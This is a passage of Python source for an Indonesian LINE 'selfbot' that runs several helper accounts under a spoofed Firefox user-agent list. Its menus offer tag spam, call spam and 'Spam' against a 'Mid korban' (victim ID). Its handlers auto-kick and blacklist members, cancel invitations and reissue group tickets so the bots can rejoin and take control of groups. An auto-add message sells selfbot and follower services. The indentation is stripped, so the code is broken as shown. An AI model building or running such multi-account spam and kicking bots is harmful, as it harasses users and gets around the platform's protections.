"groupPicture":False,
"changePicture":False,
"autoJoinTicket":True,
"userAgent": [
"Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)",
"Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (X11; Linux) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 FirePHP/0.5",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Firefox/5.0",
"Mozilla/5.0 (X11; Linux x86_64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; Linux ppc; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux AMD64) Gecko Firefox/5.0",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 6.1.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0"
]
}
wait = {
"limit": 5,
"owner":{},
"admin":{},
"addadmin":False,
"delladmin":False,
"staff":{},
"addstaff":False,
"dellstaff":False,
"bots":{},
"addbots":False,
"dellbots":False,
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"Talkblacklist":{},
"Talkwblacklist":False,
"Talkdblacklist":False,
"talkban":True,
"contact":False,
'autoJoin':True,
'autoAdd':True,
'autoRead':False,
'autoLeave':False,
'autoLeave1':False,
"detectMention":True,
"Mentionkick":False,
"welcomeOn":False,
"sticker":False,
"selfbot":True,
"protectantijsOn":True,
"ghostOn":True,
"mention":"Lagi Stalking yaaa...! gabung sini ð",
"Respontag":"Apaan tag2 kalo penting VC aja langsung",
"welcome":"Selamat datang & semoga betah",
"comment":"Like like & like ",
"message":"Terimakasih sudah add saya\n Butuh Selfbot only\n Butuh Selbot dengan asist\n Protect Room/Ivent\n Jaga room/Event\n Songbook smule\n follower smule\n V.I.P Smule\n stiker Line\n Langsung saya Tanya sama bosku yaa\n id Line udo1993 atau castello_bardian\n Thanks yaaa..!\n FI FAMZ BOTZ",
}
read = {
"readPoint":{},
"readMember":{},
"readTime":{},
"ROM":{},
}
cctv = {
"cyduk":{},
"point":{},
"sidermem":{}
}
with open('creator.json', 'r') as fp:
creator = json.load(fp)
with open('owner.json', 'r') as fp:
owner = json.load(fp)
Setbot = codecs.open("setting.json","r","utf-8")
Setmain = json.load(Setbot)
mulai = time.time()
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def restartBot():
python = sys.executable
os.execl(python, python, *sys.argv)
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
def runtime(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
days, hours = divmod(hours, 24)
return '%02d Hari %02d Jam %02d Menit %02d Detik' % (days, hours, mins, secs)
def mentionMembers(to, mid):
try:
arrData = ""
textx = "DAFTAR JONESã{}ã\n\n [ Silahkan pilih ]\n1. ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention
if no < len(mid):
no += 1
textx += "%i. " % (num)
num=(num+1)
else:
try:
no = "\nâââ[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\nâââ[ Success ]"
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def siderMembers(to, mid):
try:
arrData = ""
textx = "Hallo ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention+wait["mention"]
if no < len(mid):
no += 1
textx += "%i. " % (num)
num=(num+1)
else:
try:
no = "\nâââ[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\nâââ[ Success ]"
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def welcomeMembers(to, mid):
try:
arrData = ""
textx = "Hallo ".format(str(len(mid)))
arr = []
no = 1
num = 2
for i in mid:
ginfo = cl.getGroup(to)
mention = "@x\n"
slen = str(len(textx))
elen = str(len(textx) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':i}
arr.append(arrData)
textx += mention+wait["welcome"]+"\nNama grup : "+str(ginfo.name)
if no < len(mid):
no += 1
textx += "%i " % (num)
num=(num+1)
else:
try:
no = "\nâââ[ {} ]".format(str(cl.getGroup(to).name))
except:
no = "\nâââ[ Success ]"
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention(to, mid, firstmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x \n"
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
today = datetime.today()
future = datetime(2018,3,1)
hari = (str(future - today))
comma = hari.find(",")
hari = hari[:comma]
teman = cl.getAllContactIds()
gid = cl.getGroupIdsJoined()
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
eltime = time.time() - mulai
bot = runtime(eltime)
text += mention+"â Jam : "+datetime.strftime(timeNow,'%H:%M:%S')+" Wib\nâ© Group : "+str(len(gid))+"\nâ© Teman : "+str(len(teman))+"\nâ© Expired : In "+hari+"\nâ© Version : ANTIJS2\nâ© Tanggal : "+datetime.strftime(timeNow,'%Y-%m-%d')+"\nâ© Runtime : \n ⢠"+bot
cl.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
cl.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def command(text):
pesan = text.lower()
if pesan.startswith(Setmain["keyCommand"]):
cmd = pesan.replace(Setmain["keyCommand"],"")
else:
cmd = "command"
return cmd
def help():
key = Setmain["keyCommand"]
key = key.title()
helpMessage = "â¬â¬â¬â¬à®Û©ÛÛ©à®â¬â¬â¬â¬\n" + \
"âââ[ Menu hari ini ]\n"+\
"ââ¯â¸ " + key + "Me\n" + \
"ââ¯â¸ " + key + "Midã@ã\n" + \
"ââ¯â¸ " + key + "Infoã@ã\n" + \
"ââ¯â¸ " + key + "Nkã@ã\n" + \
"ââ¯â¸ " + key + "Kick1ã@ã\n" + \
"ââ¯â¸ " + key + "Mybot\n" + \
"ââ¯â¸ " + key + "Status\n" + \
"ââ¯â¸ " + key + "About\n" + \
"ââ¯â¸ " + key + "Restart\n" + \
"ââ¯â¸ " + key + "Runtime\n" + \
"ââ¯â¸ " + key + "Creator\n" + \
"ââ¯â¸ " + key + "Speed/Sp\n" + \
"ââ¯â¸ " + key + "Respontime\n" + \
"ââ¯â¸ " + key + "Sepinya\n" + \
"ââ¯â¸ " + key + "Joinall\n" + \
"ââ¯â¸ " + key + "Byeall\n" + \
"ââ¯â¸ " + key + "Bye me\n" + \
"ââ¯â¸ " + key + "LeaveãNamagrupã\n" + \
"ââ¯â¸ " + key + "Ginfo\n" + \
"ââ¯â¸ " + key + "Open\n" + \
"ââ¯â¸ " + key + "Close\n" + \
"ââ¯â¸ " + key + "Url\n" + \
"ââ¯â¸ " + key + "Gruplist\n" + \
"ââ¯â¸ " + key + "Openãnomerã\n" + \
"ââ¯â¸ " + key + "Closeãnomerã\n" + \
"ââ¯â¸ " + key + "Infogrupãnomerã\n" + \
"ââ¯â¸ " + key + "Infomemãnomerã\n" + \
"ââ¯â¸ " + key + "Leaveallãnomerã\n" + \
"ââ¯â¸ " + key + "Remove chat\n" + \
"ââ¯â¸ " + key + "Lurkingãon/offã\n" + \
"ââ¯â¸ " + key + "Lurkers\n" + \
"ââ¯â¸ " + key + "Siderãon/offã\n" + \
"ââ¯â¸ " + key + "Updatefoto\n" + \
"ââ¯â¸ " + key + "Updategrup\n" + \
"ââ¯â¸ " + key + "Updatebot\n" + \
"ââ¯â¸ " + key + "Broadcast:ãTextã\n" + \
"ââ¯â¸ " + key + "SetkeyãNew Keyã\n" + \
"ââ¯â¸ " + key + "Mykey\n" + \
"ââ¯â¸ " + key + "Resetkey\n" + \
"â ââ[ á´á´á´
ɪᴠ]\n" + \
"ââ¯â¸ " + key + "Kode wilayah\n" + \
"ââ¯â¸ " + key + "Listmp3\n" + \
"ââ¯â¸ " + key + "Listvideo\n" + \
"ââ¯â¸ " + key + "Listimage\n" + \
"ââ¯â¸ " + key + "Liststicker\n" + \
"ââ¯â¸ " + key + "AddimgãTeksã\n" + \
"ââ¯â¸ " + key + "DellimgãTeksã\n" + \
"ââ¯â¸ " + key + "Addmp3ãTeksã\n" + \
"ââ¯â¸ " + key + "Dellmp3ãTeksã\n" + \
"ââ¯â¸ " + key + "AddvideoãTeksã\n" + \
"ââ¯â¸ " + key + "DellvideoãTeksã\n" + \
"ââ¯â¸ " + key + "AddstickerãTeksã\n" + \
"ââ¯â¸ " + key + "DellstickerãTeksã\n" + \
"ââ¯â¸ " + key + "Spamtag:ãjumlahnyaã\n" + \
"ââ¯â¸ " + key + "Spamtagã@ã\n" + \
"ââ¯â¸ " + key + "Spamcall:ãjumlahnyaã\n" + \
"ââ¯â¸ " + key + "Spamcall\n" + \
"ââ¯â¸ " + key + "Ytmp3:ãJudul Laguã\n" + \
"ââ¯â¸ " + key + "Ytmp4:ãJudul Videoã\n" + \
"ââ¯â¸ " + key + "MusikãNama Penyanyiã\n" + \
"ââ¯â¸ " + key + "Get-fsãQueryã\n" + \
"ââ¯â¸ " + key + "Get-lineãID Lineã\n" + \
"ââ¯â¸ " + key + "Get-apkãQueryã\n" + \
"ââ¯â¸ " + key + "Get-gifãQueryã\n" + \
"ââ¯â¸ " + key + "Get-xxxãQueryã\n" + \
"ââ¯â¸ " + key + "Get-animeãQueryã\n" + \
"ââ¯â¸ " + key + "Get-mimpiãQueryã\n" + \
"ââ¯â¸ " + key + "Get-audioãQueryã\n" + \
"ââ¯â¸ " + key + "Get-mp3ãQueryã\n" + \
"ââ¯â¸ " + key + "Get-videoãQueryã\n" + \
"ââ¯â¸ " + key + "Get-bintangãZodiakã\n" + \
"ââ¯â¸ " + key + "Get-zodiakãZodiakã\n" + \
"ââ¯â¸ " + key + "Get-sholatãNama Kotaã\n" + \
"ââ¯â¸ " + key + "Get-cuacaãNama Kotaã\n" + \
"ââ¯â¸ " + key + "Get-lokasiãNama Kotaã\n" + \
"ââ¯â¸ " + key + "Get-lirikãJudul Laguã\n" + \
"ââ¯â¸ " + key + "Get-instagramãUser Nameã\n" + \
"ââ¯â¸ " + key + "Get-dateãtgl-bln-thnã\n" + \
"â ââ[ protect ]\n" + \
"ââ¯â¸ " + key + "Notagãon/offã\n" + \
"ââ¯â¸ " + key + "Allproãon/offã\n" + \
"ââ¯â¸ " + key + "Protecturlãon/offã\n" + \
"ââ¯â¸ " + key + "Protectjoinãon/offã\n" + \
"ââ¯â¸ " + key + "Protectkickãon/offã\n" + \
"ââ¯â¸ " + key + "Protectinviteãon/offã\n" + \
"ââ¯â¸ " + key + "Protectcancelãon/offã\n" + \
"ââ¯â¸ " + key + "Antijsãon/offã\n" + \
"ââ¯â¸ " + key + "Ghostãon/offã\n" + \
"â ââ[ Set kicker ]\n" + \
"ââ¯â¸ " + key + "Kickãon/offã\n" + \
"ââ¯â¸ " + key + "Nkã@ã\n" + \
"ââ¯â¸ " + key + "Kick1ã@ã\n" + \
"â ââ[ Set user ]\n" + \
"ââ¯â¸ " + key + "Inviteãon/offã\n" + \
"ââ¯â¸ " + key + "Stickerãon/offã\n" + \
"ââ¯â¸ " + key + "Unsendãon/offã\n" + \
"ââ¯â¸ " + key + "Respontimeãon/offã\n" + \
"ââ¯â¸ " + key + "Timelineãon/offã\n" + \
"ââ¯â¸ " + key + "Contactãon/offã\n" + \
"ââ¯â¸ " + key + "Autojoinãon/offã\n" + \
"ââ¯â¸ " + key + "Autoaddãon/offã\n" + \
"ââ¯â¸ " + key + "Welcomeãon/offã\n" + \
"ââ¯â¸ " + key + "Autoleaveãon/offã\n" + \
"ââ¯â¸ " + key + "Jointicketãon/offã\n" + \
"â ââ[ Set Admin ]\n" + \
"ââ¯â¸ " + key + "Selfãon/offã\n" + \
"ââ¯â¸ " + key + "Bot:on\n" + \
"ââ¯â¸ " + key + "Bot:expell\n" + \
"ââ¯â¸ " + key + "Staff:on\n" + \
"ââ¯â¸ " + key + "Staff:expell\n" + \
"ââ¯â¸ " + key + "Admin:on\n" + \
"ââ¯â¸ " + key + "Admin:expell\n" + \
"ââ¯â¸ " + key + "Botaddã@ã\n" + \
"ââ¯â¸ " + key + "Botdellã@ã\n" + \
"ââ¯â¸ " + key + "Staffaddã@ã\n" + \
"ââ¯â¸ " + key + "Staffdellã@ã\n" + \
"ââ¯â¸ " + key + "Adminaddã@ã\n" + \
"ââ¯â¸ " + key + "Admindellã@ã\n" + \
"ââ¯â¸ " + key + "Refresh\n" + \
"ââ¯â¸ " + key + "Listbot\n" + \
"ââ¯â¸ " + key + "Listadmin\n" + \
"ââ¯â¸ " + key + "Listprotect\n" + \
"âââ[ Famz_Botz_FI ]\n" + \
"â¬â¬â¬â¬à®Û©ÛÛ©à®â¬â¬â¬â¬\n" + \
"\nKetikã Refresh ãjika makanannya sudah habis...\n"
return helpMessage
def helpbot():
key = Setmain["keyCommand"]
key = key.title()
helpMessage1 = "â¬â¬â¬â¬à®Û©ÛÛ©à®â¬â¬â¬â¬\n" + \
"âââ[ Makan__Malam ]\n"+\
"ââ¯â¸ " + key + "Blc\n" + \
"ââ¯â¸ " + key + "Ban:on\n" + \
"ââ¯â¸ " + key + "Unban:on\n" + \
"ââ¯â¸ " + key + "Banã@ã\n" + \
"ââ¯â¸ " + key + "Unbanã@ã\n" + \
"ââ¯â¸ " + key + "Talkbanã@ã\n" + \
"ââ¯â¸ " + key + "Untalkbanã@ã\n" + \
"ââ¯â¸ " + key + "Talkban:on\n" + \
"ââ¯â¸ " + key + "Untalkban:on\n" + \
"ââ¯â¸ " + key + "Banlist\n" + \
"ââ¯â¸ " + key + "Talkbanlist\n" + \
"ââ¯â¸ " + key + "Clearban\n" + \
"ââ¯â¸ " + key + "Refresh\n" + \
"â ââ[ Cek Seting ]\n" + \
"ââ¯â¸ " + key + "Cek sider\n" + \
"ââ¯â¸ " + key + "Cek spam\n" + \
"ââ¯â¸ " + key + "Cek pesan \n" + \
"ââ¯â¸ " + key + "Cek respon \n" + \
"ââ¯â¸ " + key + "Cek leave\n" + \
"ââ¯â¸ " + key + "Cek welcome\n" + \
"ââ¯â¸ " + key + "Set sider:ãTextã\n" + \
"ââ¯â¸ " + key + "Set spam:ãTextã\n" + \
"ââ¯â¸ " + key + "Set pesan:ãTextã\n" + \
"ââ¯â¸ " + key + "Set respon:ãTextã\n" + \
"ââ¯â¸ " + key + "Set leave:ãTextã\n" + \
"ââ¯â¸ " + key + "Set welcome:ãTextã\n" + \
"ââ¯â¸ " + key + "Myname:ãNamaã\n" + \
"ââ¯â¸ " + key + "Gift:ãMid korbanããJumlahã\n" + \
"ââ¯â¸ " + key + "Spam:ãMid korbanããJumlahã\n" + \
"âââ[ Famz_Botz_FI ]\n" + \
"â¬â¬â¬â¬à®Û©ÛÛ©à®â¬â¬â¬â¬\n" + \
"\nKetikã Refresh ãjika makannya sudah kenyang...\n"
return helpMessage1
def bot(op):
global time
global ast
global groupParam
try:
if op.type == 0:
return
if op.type == 11:
if op.param1 in protectqr:
wait["blacklist"][op.param2] = True
try:
if cl.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.reissueGroupTicket(op.param1)
X = cl.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = cl.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
sw.leaveGroup(op.param1)
cl.updateGroup(X)
except:
try:
if ki.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ki.reissueGroupTicket(op.param1)
X = ki.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = ki.reissueGroupTicket(op.param1)
sx.acceptGroupInvitationByTicket(op.param1,Ticket)
sx.kickoutFromGroup(op.param1,[op.param2])
sx.leaveGroup(op.param1)
ki.updateGroup(X)
except:
try:
if kk.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kk.reissueGroupTicket(op.param1)
X = kk.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = kk.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
sw.leaveGroup(op.param1)
kk.updateGroup(X)
except:
try:
if kc.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kc.reissueGroupTicket(op.param1)
X = kc.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = kc.reissueGroupTicket(op.param1)
sx.acceptGroupInvitationByTicket(op.param1,Ticket)
sx.kickoutFromGroup(op.param1,[op.param2])
sx.leaveGroup(op.param1)
kc.updateGroup(X)
except:
try:
if km.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
km.reissueGroupTicket(op.param1)
X = km.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = km.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
km.updateGroup(X)
except:
try:
if kb.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kb.reissueGroupTicket(op.param1)
X = kb.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = kb.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
kb.updateGroup(X)
except:
try:
if kn.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kb.reissueGroupTicket(op.param1)
X = kb.getGroup(op.param1)
X.preventedJoinByTicket = True
Ticket = kb.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
kn.updateGroup(X)
except:
pass
if op.type == 13:
if mid in op.param3:
if wait["autoLeave"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
cl.leaveGroup(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Hai " + str(ginfo.name))
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Haii " +str(ginfo.name))
else:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Haii " + str(ginfo.name))
if Amid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ki.acceptGroupInvitation(op.param1)
ginfo = ki.getGroup(op.param1)
ki.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
ki.leaveGroup(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
ginfo = ki.getGroup(op.param1)
ki.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Bmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kk.acceptGroupInvitation(op.param1)
ginfo = kk.getGroup(op.param1)
ki.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
kk.leaveGroup(op.param1)
else:
kk.acceptGroupInvitation(op.param1)
ginfo = kk.getGroup(op.param1)
kk.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Cmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kc.acceptGroupInvitation(op.param1)
ginfo = kc.getGroup(op.param1)
kc.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
kc.leaveGroup(op.param1)
else:
kc.acceptGroupInvitation(op.param1)
ginfo = kc.getGroup(op.param1)
kc.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Dmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
km.acceptGroupInvitation(op.param1)
ginfo = km.getGroup(op.param1)
km.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
km.leaveGroup(op.param1)
else:
kb.acceptGroupInvitation(op.param1)
ginfo = km.getGroup(op.param1)
kb.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Emid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kb.acceptGroupInvitation(op.param1)
ginfo = kb.getGroup(op.param1)
kb.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
kb.leaveGroup(op.param1)
else:
kb.acceptGroupInvitation(op.param1)
ginfo = kb.getGroup(op.param1)
kb.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Fmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kn.acceptGroupInvitation(op.param1)
ginfo = kn.getGroup(op.param1)
kn.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
kn.leaveGroup(op.param1)
else:
kn.acceptGroupInvitation(op.param1)
ginfo = kn.getGroup(op.param1)
kn.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Gmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ko.acceptGroupInvitation(op.param1)
ginfo = ko.getGroup(op.param1)
ko.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
ko.leaveGroup(op.param1)
else:
ko.acceptGroupInvitation(op.param1)
ginfo = ko.getGroup(op.param1)
ko.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Hmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kw.acceptGroupInvitation(op.param1)
ginfo = kw.getGroup(op.param1)
kw.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
kw.leaveGroup(op.param1)
else:
kw.acceptGroupInvitation(op.param1)
ginfo = kw.getGroup(op.param1)
kw.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Imid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ke.acceptGroupInvitation(op.param1)
ginfo = ke.getGroup(op.param1)
ke.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
ke.leaveGroup(op.param1)
else:
ke.acceptGroupInvitation(op.param1)
ginfo = ke.getGroup(op.param1)
ke.sendMessage(op.param1,"Hai " + str(ginfo.name))
if Jmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ky.acceptGroupInvitation(op.param1)
ginfo = ky.getGroup(op.param1)
ky.sendMessage(op.param1,"Selamat Tinggal\n Group " +str(ginfo.name))
ky.leaveGroup(op.param1)
else:
ky.acceptGroupInvitation(op.param1)
ginfo = ky.getGroup(op.param1)
ky.sendMessage(op.param1,"Hai " + str(ginfo.name))
if op.type == 13:
if op.param1 in protectinvite:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
try:
group = kn.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
kn.cancelGroupInvitation(op.param1,[_mid])
kn.kickoutFromGroup(op.param1,[op.param2])
except:
try:
group = ko.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
ko.cancelGroupInvitation(op.param1,[_mid])
ko.kickoutFromGroup(op.param1,[op.param2])
except:
try:
group = kw.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
kw.cancelGroupInvitation(op.param1,[_mid])
kw.kickoutFromGroup(op.param1,[op.param2])
except:
try:
group = ke.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
ke.cancelGroupInvitation(op.param1,[_mid])
ke.kickoutFromGroup(op.param1,[op.param2])
except:
pass
if op.type == 17:
if op.param2 in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 17:
if op.param1 in welcome:
if op.param2 in Bots:
pass
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2).picturePath
image = 'http://dl.profile.line.naver.jp'+contact
welcomeMembers(op.param1, [op.param2])
cl.sendImageWithURL(op.param1, image)
if op.type == 17:
if op.param1 in protectjoin:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
if (wait["message"] in [" "," ","\n",None]):
pass
else:
cl.sendText(op.param1, wait["message"])
if op.type == 19:
if op.param1 in protectkick:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 19:
try:
if op.param1 in ghost:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
G = cl.getGroup(op.param1)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(op.param1)
sw.acceptGroupInvitationByTicket(op.param1,Ticket)
sw.kickoutFromGroup(op.param1,[op.param2])
sw.leaveGroup(op.param1)
X = cl.getGroup(op.param1)
X.preventedJoinByTicket = True
cl.updateGroup(X)
except:
pass
if op.type == 19:
try:
if op.param1 in protectantijs:
if op.param3 in mid:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
js.acceptGroupInvitation(op.param1)
G = js.getGroup(op.param1)
G.prevenJoinByTicket = False
js.updateGroup(G)
Ticket = js.reissueGroupTicket(op.param1)
random.choice(KAC).acceptGroupInvitationByTicket(op.param1,Ticket)
js.kickoutFromGroup(op.param1,[op.param2])
G.prevenJoinByTicket = True
js.updateGroup(G)
wait["blacklist"][op.param2] = True
js.leaveGroup(op.param1)
cl.inviteIntoGroup(op.param1,[JSmid])
cl.inviteIntoGroup(op.param1,[admin])
else:
pass
if op.param3 in JSmid:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[JSmid])
cl.sendMessage(op.param1,"=AntiJS Invited=")
else:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[JSmid])
cl.sendMessage(op.param1,"=AntiJS Invited=")
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
